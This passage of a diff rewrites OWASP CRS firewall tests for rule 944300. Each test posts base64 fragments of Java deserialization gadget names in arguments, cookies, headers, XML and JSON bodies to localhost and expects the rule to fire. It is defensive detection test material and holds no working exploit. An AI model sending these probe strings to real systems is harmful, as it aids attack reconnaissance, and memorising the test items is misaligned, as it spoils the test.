CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI=test" + output: + log: + expect_ids: [944300] + - test_id: 80 desc: "Cookie test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=GNsb25ldHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-81 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=GNsb25ldHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 81 desc: "Cookie name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: GNsb25ldHJhbnNmb3JtZXI=test - method: "POST" - uri: "/post" - 
version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-82 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: GNsb25ldHJhbnNmb3JtZXI=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 82 desc: "Request header test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: GNsb25ldHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-83 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: GNsb25ldHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 83 desc: "XML attribute value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-84 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 84 desc: "XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-85 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 85 desc: "Nested XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - 
headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-86 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 86 desc: "Content-Type text/plain includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-87 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=GNsb25ldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 87 desc: "Content-Type application/json 
arg value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"GNsb25ldHJhbnNmb3JtZXI\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-88 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"GNsb25ldHJhbnNmb3JtZXI\"}" + output: + log: + expect_ids: [944300] + - test_id: 88 desc: "Content-Type application/json arg name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"GNsb25ldHJhbnNmb3JtZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-89 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"GNsb25ldHJhbnNmb3JtZXI\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 89 desc: "Argument test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-90 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BjbG9uZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 90 desc: "Argument name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BjbG9uZXRyYW5zZm9ybWVy=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-91 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy=test" + output: + log: + expect_ids: [944300] + - test_id: 91 desc: "Cookie test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BjbG9uZXRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-92 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BjbG9uZXRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 92 desc: "Cookie name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BjbG9uZXRyYW5zZm9ybWVy=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - 
data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-93 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BjbG9uZXRyYW5zZm9ybWVy=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 93 desc: "Request header test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BjbG9uZXRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-94 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BjbG9uZXRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 94 desc: "XML attribute value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-95 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 95 desc: "XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-96 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 96 desc: "Nested XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-97 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 97 desc: "Content-Type text/plain includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-98 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BjbG9uZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 98 desc: "Content-Type application/json arg value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: 
- dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BjbG9uZXRyYW5zZm9ybWVy\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-99 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BjbG9uZXRyYW5zZm9ybWVy\"}" + output: + log: + expect_ids: [944300] + - test_id: 99 desc: "Content-Type application/json arg name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BjbG9uZXRyYW5zZm9ybWVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-100 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 
"{\"BjbG9uZXRyYW5zZm9ybWVy\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 100 desc: "Argument test includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-101 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Zm9yY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 101 desc: "Argument name includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Zm9yY2xvc3VyZQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-102 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ=test" + output: + log: + expect_ids: [944300] + - test_id: 102 desc: "Cookie test includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Zm9yY2xvc3VyZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-103 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Zm9yY2xvc3VyZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 103 desc: "Cookie name includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Zm9yY2xvc3VyZQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-104 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP 
CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Zm9yY2xvc3VyZQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 104 desc: "Request header test includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Zm9yY2xvc3VyZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-105 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Zm9yY2xvc3VyZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 105 desc: "XML attribute value includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - 
